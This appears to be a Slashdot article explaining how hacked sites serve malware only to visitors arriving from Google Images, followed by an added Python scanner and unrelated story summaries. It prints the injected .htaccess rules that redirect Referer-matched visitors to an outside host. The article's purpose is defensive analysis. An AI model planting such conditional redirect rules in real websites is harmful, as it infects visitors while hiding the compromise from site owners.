Slashdot frequent contributor Bennett Haselton writes "Sites that have been hacked by malware writers are now serving infected content only when the visitor views the site through a frame on Google Images. This recent twist on a standard trick used by malware writers, makes it harder for webmasters and hosting companies to discover that their sites have been infected. Automated tools that check websites for infections and training procedures for hosting company abuse-department staffers will have to be updated accordingly." Read on for the rest of Bennett's thoughts.A friend of mine recently e-mailed a discussion list with an interesting query. Stonewall Ballard had searched on "tradingbloxlogo" on Google Images, which led to the results on this page. Clicking on the first result, an image from the tradingblox.com site, took him to this page, with the Google information header at the top, and loading the http://www.tradingblox.com/tradingblox/courses.htm page in a frame in the bottom half of the browser window. When that page was loaded in that bottom frame, Internet Explorer and Firefox would both flash warnings about the page being infected with malware. But if you loaded the http://www.tradingblox.com/tradingblox/courses.htm page in a normal Web browser window by itself, the browser would not display any warning, and checking the site using Google's malware query form returned a result saying the site was not suspicious. Why the differing results?
It turned out that the tradingblox.com had been hacked, and pages had been installed onto the server that would serve malware in an unusual way: If the page was being viewed in a frame loaded from Google Images, or as as result of a click through from Google Images, then the page would serve content that attempted to infect the user's computer with malware. On the other hand, if the page was viewed normally (as a result of typing the page into your browser), the malware-loading code would not be served. That means if you were to telnet to port 80 on the www.tradingblox.com server, and request a page as follows:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.comthen the normal page would be returned. But if you entered these commands:
GET /tradingblox/courses.htm HTTP/1.1
Host: www.tradingblox.com
Referer: http://images.google.com/then you would get the malware-infected page. (The webmaster has since fixed the problem, so that the latter request will no longer get the malware code.) The webserver would only serve the infected content if "images.google.com" was sent specifically as the referrer; "www.google.com" by itself would not trigger the result.
(For the uninitiated, when you click a link from one page to another, for example if you were reading an article on CNN.com which had a link to http://www.google.com/support/ and you clicked on that link, then when your browser requested the file "/support/" from the www.google.com server, it would send the request as follows:
GET /support/ HTTP/1.1
Host: www.google.com
Referer: http://www.cnn.com/article.url.goes.here/So the webmasters of www.google.com can see what links people are clicking from other websites to reach the www.google.com site. Many sites use this to track which links from other pages, including advertisements that they've bought on other sites, are sending them the most traffic.)
Denis Sinegubko, owner of the website malware-infection checking site UnmaskParasites.com, says that he had seen pages before which would serve infected content if www.google.com itself were listed in the Referer: field. However, this was the first instance he'd seen where the content was only served if images.google.com was specifically listed as the Referer. Since no malware distributor would manually break into just one website to compromise it in this exact manner, it's extremely likely that there are many more sites that are infected in the same way. Stonewall Ballard noted that the Google Safe Browsing lookup for the hosting company where tradingblox.com is hosted, showed a high number of other sites on the same network that had been infected recently. (And those are only the infected sites that Google knows about -- recall that Google didn't even know that tradingblox.com was infected.)
Obviously, from the malware author's point of view, the point of serving malware content only some of the time rather than all of the time, is to make it harder for webmasters to pinpoint the problem. Someone gets the malware warning after following a link or loading a page via Google Images, and sends the webmaster an e-mail saying, "I got infected by your webpage, here is the link." The webmaster views the link and says, "I don't know what you're talking about, there's no malware code on that page." It also makes it harder for automated site-checking tools to detect the infection. Google's Safe Browsing lookup tool reported the site as uninfected, and Sinegubko's site-checking tool on UnmaskParasites.com also reported no malware infections on tradingblox.com, even while the site was still infected. (Sinegubko said he would possibly modify his site-checking script so that in addition to the other checks it performs, it will attempt to request a page sending "http://images.google.com/" in the "Referer:" field, to see if that results in different content being served. Google's Safe Browsing spider should do the same.)
Sinegubko said he's also seen instances where hacked sites would cover their tracks even further, by refusing to display infected content if the Referer: link from Google contained "inurl:domainname.com" or "site:domainname.com". This is because webmasters would sometimes check if their site was serving infected content in response to a click from Google, by doing a Google search on their own domainname.com, and following the link back to their site. By not serving the infected content in that case, the malware infection becomes even harder to detect.
This also makes it harder to report the exploits to the hosting companies that host infected websites. In case the webmaster of the infected site doesn't respond to complaints that their site is infected, sometimes you have to contact the hosting company and ask them to forcibly take the website offline until the problem is fixed. And I have been hosted by several companies where the tech support and abuse departments were (just barely) competent enough that if I called them up and said, "Your customer is hosting a malware-infected webpage, go to this page and view the source code, and you can see the malicious code", they would have known what to do. But if I'd had to tell them to follow the steps above -- "telnet to port 80" on the infected website, and type a few lines to mimic the process of a browser sending HTTP request headers to the website -- I probably would have lost them at "telnet". (Recall an experiment wherein I e-mailed some hosting companies from a Hotmail account, asking them to change the nameservers for a domain that I had hosted with them, and about half of the hosting companies agreed to switch the domain nameservers -- essentially, transferring the entire website to an unknown third party -- without ever authenticating that it was really me writing from that Hotmail account. Which means anybody could have taken over those websites simply by sending an e-mail. Front-end tech support at cheap hosting companies is often not very smart.)
Fortunately, Tim Arnold, the webmaster of the tradingblox.com site, did respond to the original report about the malware-infected pages, and found that an intruder had hacked the site on November 30th and inserted these lines into an .htaccess file:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://search-box.in/in.cgi?4&parameter=u [R,L]
<Files 403.shtml>
order allow,deny
allow from all
</Files>
which resulted in the infected pages being served whenever a user loaded the site via Google Images. (So if you found this article because you think your own site might be infected by malware that serves pages conditionally on the Referer: field, that's the first place to look to fix the problem!)
It's uncertain how Arnold's site got infected in the first place, but Sinegubko had earlier said that almost 90% of breakins in 2009 that occurred on Linux-hosted sites, were caused by malware installed surreptitiously on people's Windows PCs and stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit such as this one. As I always tell anyone who will listen, if you want to keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.
But the larger point is that as malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. Abuse report handlers will have to be trained to understand what it means that a website is only showing infected content as a result of a "Referer:" header, and ideally should know enough about networking and command-line tools, to be able to mimic the "telnet" instructions above. (Most expensive dedicated hosting companies like RackSpace, do have technical staff who are at least that knowledgeable. But cheap shared hosting companies -- the kind where you can get your domain transferred to another company by sending an e-mail from an unauthenticated Hotmail account -- will have to train their abuse staff better.) Automated site-checking tools like Google's Safe Browsing spider and UnmaskParasites.com's site checker will have to start taking these attacks into account when checking a site for infection.
And as always, keeping your PC free of spyware, shouldn't be viewed just as a convenience to yourself, but as an obligation to your neighbors as well. (A case of the positive/negative externalities problem in economics.) You wouldn't send your kid to school with the flu, so why did you get your Mom on the Internet without buying her some anti-virus software?
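The following scanner is an added example, not part of the original article or of any tool it mentions. It checks an .htaccess file for the pattern quoted above: a RewriteRule that sends visitors to a foreign host only when a RewriteCond tests the Referer. The sample input is constructed, modelled on the quoted lines with a placeholder redirect host; the names scan_htaccess, own_hosts and example.org are assumptions.

```python
from urllib.parse import urlsplit

# Constructed sample: the shape of the injected rule from the article (with a
# placeholder redirect host), plus two benign rules a real site might carry.
SAMPLE_HTACCESS = r"""RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [NC]
RewriteRule .* http://redirect-target.example/in.cgi [R,L]

# Benign: hotlink protection also tests the Referer but only refuses images.
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.org/ [NC]
RewriteRule \.(gif|jpe?g|png)$ - [F,NC]

# Benign: canonical-host redirect to the site's own name, no Referer test.
RewriteCond %{HTTP_HOST} ^example\.org$ [NC]
RewriteRule ^(.*)$ https://www.example.org/$1 [R=301,L]
"""


def parse_flags(token):
    """Turn a mod_rewrite flag token such as '[R=301,L]' into {'R', 'L'}."""
    if not (token.startswith("[") and token.endswith("]")):
        return set()
    return {f.split("=")[0].strip().upper()
            for f in token[1:-1].split(",") if f.strip()}


def external_host(target, own_hosts):
    """Return the host of an absolute http(s) target that is not ours, else None."""
    try:
        parts = urlsplit(target)
    except ValueError:
        return None
    host = parts.hostname
    if parts.scheme not in ("http", "https") or not host:
        return None
    if "%" in host or "$" in host:   # host built from variables/backreferences
        return None
    return None if host in own_hosts else host


def scan_htaccess(text, own_hosts=()):
    """Flag RewriteRules that redirect off-site only for certain Referer values.

    RewriteCond lines apply to the next RewriteRule only, so conditions are
    collected until a rule consumes them. Arguments are split on whitespace;
    quoted arguments containing spaces are not handled.
    """
    findings = []
    pending = []                      # (line number, test string, pattern)
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        name = parts[0].lower()
        if name == "rewritecond" and len(parts) >= 3:
            pending.append((lineno, parts[1], parts[2]))
        elif name == "rewriterule" and len(parts) >= 3:
            conds, pending = pending, []
            referer = [c for c in conds if "HTTP_REFERER" in c[1].upper()]
            # An absolute URL on another host is an external redirect even
            # without the R flag, so the target decides, not the flags.
            host = external_host(parts[2], own_hosts)
            if referer and host:
                flags = parse_flags(parts[3]) if len(parts) > 3 else set()
                findings.append({
                    "rule_line": lineno,
                    "cond_lines": [c[0] for c in referer],
                    "referer_patterns": [c[2] for c in referer],
                    "target_host": host,
                    "flags": sorted(flags),
                })
    return findings


if __name__ == "__main__":
    for f in scan_htaccess(SAMPLE_HTACCESS, {"example.org", "www.example.org"}):
        print(f)
```

This scanner only reports redirects to a literal foreign host; a Referer-conditioned rule that rewrites internally to a file on the same server is not flagged by it, and neither is conditional logic placed in server-side scripts rather than .htaccess.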
-
Nexus One Update Fixes 3G, Adds Multitouch
snydeq writes "Google is pushing out an update for the Nexus One that will fix a 3G connectivity problem and add limited support for multitouch. After receiving over 1,500 messages in a support forum from people complaining about trouble connecting to 3G, Google said it has identified the problem and has started delivering the fix. In addition to fixing 3G, the update adds the first applications to support multitouch. While the recent versions of the Android OS include multitouch capability, no phone in the US has supported it." -
Huge Phishing Attack On Emissions Trade In Europe
bratgitarre writes "A targeted phishing scam on companies trading with greenhouse gas emission certificates in Europe has reaped millions, Der Spiegel reports. By sending phishing e-mails to companies in Australia and New Zealand purporting to be from the German Ministry for Environmental Protection (German article, Google translation) the criminals obtained login credentials for companies owning polluting permissions. They then swiftly sold them to other polluters in various European countries. Damages are probably huge for a single incident, as 'one medium-sized German company alone had lost allowances worth €1.5 million ($2.1 million).' German federal officials, who can trace some of the transactions, claim that out of 2000 certificate sellers, seven responded to the scam." -
Mozilla Accepts Chinese CNNIC Root CA Certificate
Josh Triplett writes "Last October, Mozilla accepted the China Internet Network Information Center as a trusted CA root (Bugzilla entry). This affects Firefox, Thunderbird, and other products built on Mozilla technologies. The standard period for discussion passed without comment, and Mozilla accepted CNNIC based on the results of a formal audit. Commenters in the bug report and the associated discussion have presented evidence that the Chinese government controls CNNIC, and surfaced claims of malware production and distribution and previous man-in-the-middle attacks in China via their secondary CA root from Entrust. As usual, please refrain from blindly chiming into the discussion without supporting evidence. Since Mozilla has already accepted CNNIC as a trusted root CA, the burden rests with those who argue for its removal." -
Denmark Chooses OpenDocument Format
Seahawk was one of several readers to write in with news of Denmark's decision to embrace ODF. "On Friday morning Denmark decided to choose ODF over Microsoft's OOXML. For now the decision is only effective for governmental institutions, but regions and municipalities will most likely follow some time in the future. The decision has unfolded over a period of four years, and many open source advocates were fearing the worst, but it looks like the minister finally caved in and listened to what a lot of people were saying." While in transition away from Microsoft Office formats, the Danes may find use for this new OpenOffice integration guide (sent in by reader AdeleWard). -
Russian Stealth Fighter Makes Its First Flight
An anonymous reader writes "The long-awaited Russian stealth fighter, codenamed PAK FA or T-50, has had its first test flight today. This Google translation of a Russian article has a photo of the jet. Production is supposed to begin in 2015; the AP reports that India is helping with development. It's reportedly designed to compete with America's F-22 (first flight: 1997). Relatedly, according to Wikipedia, Japan is planning to fly its own stealth fighter, the ATD-X, which we have previously discussed, in 2011." -
Freeciv As Benchmark of HTML5 Canvas Javascript Performance
Andreas(R) writes "The Freeciv.net crew has benchmarked their web client, which is a rich web application using the HTML5 canvas element. This shows how fast Firefox, Google Chrome, Safari and Internet Explorer perform using the latest HTML5 web standards." -
China Will Lead World Scientific Research By 2020
Hugh Pickens writes "An analysis of papers published in 10,500 academic journals across the world shows that, in terms of academic papers published, China is now second only to the US, and will take first place by 2020. Chinese scientists are increasing their output at a far faster rate than counterparts in rival 'emerging' nations such as India, Russia, and Brazil. The number of peer-reviewed papers published by Chinese researchers rose 64-fold over the past 30 years. 'China is out on its own, far ahead of the pack,' says James Wilsdon, of the Royal Society in London. 'If anything, China's recent research performance has exceeded even the high expectations of four or five years ago.' According to Wilsdon, three main factors are driving Chinese research. First is the government's enormous investment, with funding increases far above the rate of inflation, at all levels of the system from schools to postgraduate research. Second is the organized flow of knowledge from basic science to commercial applications. And third is the efficient and flexible way in which China is tapping the expertise of its extensive scientific diaspora in North America and Europe, tempting back mid-career scientists with deals that allow them to spend part of the year working in the West and part in China." Here's the Financial Times's original article. -
SAS Named Best Company To Work For In 2010
theodp writes "If you're in the market for a new job, Fortune has just published its list of 100 Best Companies to Work For in 2010. Topping the list this year is SAS (SAS jobs), the largest privately held software company, which Fortune notes is populated with more statisticians than engineers or MBAs, and led by a Ph.D. founder whose first love is programming. Google (jobs), which once viewed SAS as a model for employee perks, took the #4 spot, and Microsoft (jobs) checked in at #51." -
Russian Whistleblower Cop Arrested
Remember the Russian cop's YouTube narrative on police corruption? Reader Max_W writes with the news that Alexei Dymovsky, the cop whose videos started a movement, was arrested (Google translation; Russian original) on January 22, 2010. He is in prison in the south of Russia. Max_W adds: "It seems only a president is allowed to have a video blog in Russia." -
Raw Therapee 3 Is Now Free Software
kantier writes "The only (as far as I know) usable and free (as in beer) program for processing RAW photos outside Windows or OS X is now also free as in freedom. From version 3 onwards, the code is licensed under the GPL v3. The main developer's reasons for opening up the program are a lack of time/resources for full dedication, and a lack of interest in some parts of the program (likes to fiddle with image-processing algorithms, not so much the GUI part) — so the F/OSS model seems to be a perfect fit for this project." -
In UK, Oink Admin Cleared of Fraud
krou writes "The BBC is reporting that Alan Ellis, who ran music file sharing site Oink from his flat in the UK, has been found not guilty of conspiracy to defraud. Between 2004 and 2007, the site 'facilitated the download of 21 million music files' by allowing its some 200,000 'members to find other people on the web who were prepared to share files.' Ellis was making £18,000 a month ($34,600) from donations from users, and claimed that he had no intention of defrauding copyright holders, and said 'All I do is really like Google, to really provide a connection between people. None of the music is on my website.'" Reader Andorin recommends Torrentfreak's coverage, which includes summaries of the closing arguments. -
Airport Access IDs Hacked In Germany
teqo writes "Hackers belonging to the Chaos Computer Club have allegedly cloned digital security ID cards for some German airports successfully which then allowed them access to all airport areas. According to the Spiegel Online article (transgoogleation here), they used a 200 Euro RFID reader to scan a valid security ID card, and since the scanner was able to pretend to be that card, used it to forge that valid ID. Even the airport authorities say that the involved system from 1992 might be outdated, but I guess it might be deployed elsewhere anyway." -
Nexus One Owners Report Spotty 3G Signals On T-Mobile
rsk writes "One of the most popular questions on the Google Nexus One support forums is the 'Spotty 3G?' thread with almost 700 posts of users complaining about their 3G signal coverage fluctuating up, down, and between EDGE/3G with the phone just sitting on the desk or compared to other 3G devices on the T-Mobile network that don't offer the same unpredictable behavior. One workaround that seems to fix the issue is forcing the phone into '3G' or 'WCDMA Only' mode. This is a bit of a downer given that T-Mobile just finished their 3G upgrade to 7.2Mbps. Official word from Google is 'We are investigating this issue....'" -
US Youth Have Serious Mental Health Issues
Ant writes "Google News carries a Canadian Press report that 'a new study has found that five times as many high school and college students in the United States are dealing with anxiety and other mental health issues than youth of the same age who were studied in the Great Depression era. ... Pulling together the data for the study was no small task. Led by [San Diego State University psychology professor Jean Twenge], researchers at five universities analyzed the responses of 77,576 high school or college students who, from 1938 through 2007, took the Minnesota Multiphasic Personality Inventory, or MMPI. The results will be published in a future issue of the Clinical Psychology Review. Overall, an average of five times as many students in 2007 surpassed thresholds in one or more mental health categories, compared with those who did so in 1938. A few individual categories increased at an even greater rate — with six times as many scoring high in two areas: 'hypomania,' a measure of anxiety and unrealistic optimism (from 5 per cent of students in 1938 to 31 per cent in 2007), and depression (from 1 per cent to 6 per cent).'" -
Google Applies To Become Energy Marketer
necro81 writes "Google consumes massive amounts of electrical energy to power its data centers across the country and world. Now it has created a subsidiary, Google Energy LLC, and applied (pdf) to the Federal Energy Regulatory Commission to become a utility-scale energy trader. Google's stated aim is to be able to purchase renewable energy directly from producers at bulk rates, pursuing its goal of becoming carbon neutral. It is likely that Google Energy would also permit Google's own renewable energy projects to sell their energy at more favorable rates. Google reportedly does not have plans to actively become an energy broker, a la Enron." -
Google's Nexus One Phone Launches
The press conference at the Googleplex is over and Google's Nexus One phone has launched (official Google blog announcement). The NY Times confirms the bare details: manufactured by HTC; $529 unlocked, $179 with 2-year T-Mobile contract; coming to Verizon in the US, and Vodafone in Europe, in "Spring 2010." The Times notes one desirable feature: "[Google] has also voice-enabled all text boxes in the device, so a user can speak into the device to, for instance, compose an e-mail, rather than type the text of the email." Walt Mossberg points out one limitation: "On the Nexus One, only 190 megabytes of its total 4.5 gigabytes of memory is allowed for storing apps. On the $199 iPhone, nearly all of the 16 gigabytes of memory can be used for apps." No answers yet to the obvious questions: can it tether on T-Mobile? Will it allow VoIP? -
Scientists Postulate Extinct Hominid With 150 IQ
Hugh Pickens writes "Neuroscientists Gary Lynch and Richard Granger have an interesting article in Discover Magazine about the Boskops, an extinct hominid that had big eyes, child-like faces, and forebrains roughly 50% larger than modern man indicating they may have had an average intelligence of around 150, making them geniuses among Homo sapiens. The combination of a large cranium and immature face would look decidedly unusual to modern eyes, but not entirely unfamiliar. Such faces peer out from the covers of countless science fiction books and are often attached to 'alien abductors' in movies. Naturalist Loren Eiseley wrote: 'Back there in the past, ten thousand years ago. The man of the future, with the big brain, the small teeth. He lived in Africa. His brain was bigger than your brain.' The history of evolutionary studies has been dogged by the almost irresistible idea that evolution leads to greater complexity, to animals that are more advanced than their predecessor, yet the existence of the Boskops argues otherwise — that humans with big brains, and perhaps great intelligence, occupied a substantial piece of southern Africa in the not very distant past, and that they eventually gave way to smaller-brained, possibly less advanced Homo sapiens — that is, ourselves. 'With 30 percent larger brains than ours now, we can readily calculate that a population with a mean brain size of 1,750 cc would be expected to have an average IQ of 149,' write Lynch and Granger. But why did they go extinct? 'Maybe all that thoughtfulness was of no particular survival value in 10,000 BC. Lacking the external hard drive of a literate society, the Boskops were unable to exploit the vast potential locked up in their expanded cortex,' write Lynch and Granger. 'They were born just a few millennia too soon.'" -
An Open Source Compiler From CUDA To X86-Multicore
Gregory Diamos writes "An open source project, Ocelot, has recently released a just-in-time compiler for CUDA, allowing the same programs to be run on NVIDIA GPUs or x86 CPUs and providing an alternative to OpenCL. A description of the compiler was recently posted on the NVIDIA forums. The compiler works by translating GPU instructions to LLVM and then generating native code for any LLVM target. It has been validated against over 100 CUDA applications. All of the code is available under the New BSD license." -
Amazon Kindle Proprietary Format Broken
An anonymous reader writes "The Register reports that the proprietary document format used by the Amazon online store and Amazon's Kindle has been successfully reverse engineered, allowing these DRM-protected documents to be converted into the open MOBI format. Users of alternative e-book readers rejoice." Here are the hacker's notes on the program he is calling "Unswindle," and here is the (translated) forum where the Kindle challenge was posed and answered. -
Where Are the Cheap Thin Clients?
Darren Ginter writes "I find many aspects of desktop virtualization compelling, with one exception: the cost of the thin clients, which typically exceeds that of a traditional box. I understand all of the benefits of desktop virtualization (and the downsides, thanks) but I'm very hung up on spending more for less. While there are some sub-$200 products out there, they all seem to cut corners (give me non-vaporware that will drive a 22" LCD at full resolution). I can PXE boot a homebrew Atom-based thin client for $130, but I'd prefer to be able to buy something assembled. Am I missing something here?" -
Verizon Defends Doubling of Early Termination Fee
I Don't Believe in Imaginary Property writes "Verizon is defending its decision to double its Early Termination Fee from $175 to $350 after being called to account by the FCC. They claim it's because the higher fees allow them to offer more expensive phones with a lower up-front cost (PDF), and they also say that because they pro-rate the fee depending on how much of your contract is left, they still lose money. Apparently doing something about the Verizon customer service horror stories isn't as good a way to retain customers as telling them that they have to pay several hundred dollars to leave." -
Google Open Sources Etherpad, Piratepad Launches
Thomas Nybergh writes "The Etherpad code was released by Google under the Apache license a few hours ago. Google's initial plan, after acquiring the service, was to use Etherpad's tech with its new Wave collaboration platform and to shut down the original service entirely. Soon after the Etherpad code was released, the Swedish Pirate Party launched their instance of the service at piratepad.net. An announcement, which also mentions a new Tor node, is published on the party website (Google translation). The original Etherpad service had in a short time become a killer application for collaborative work within at least the Swedish, and according to my personal experience, in the Finnish Pirate Party as well. The Etherpad open source project is available at Google Code."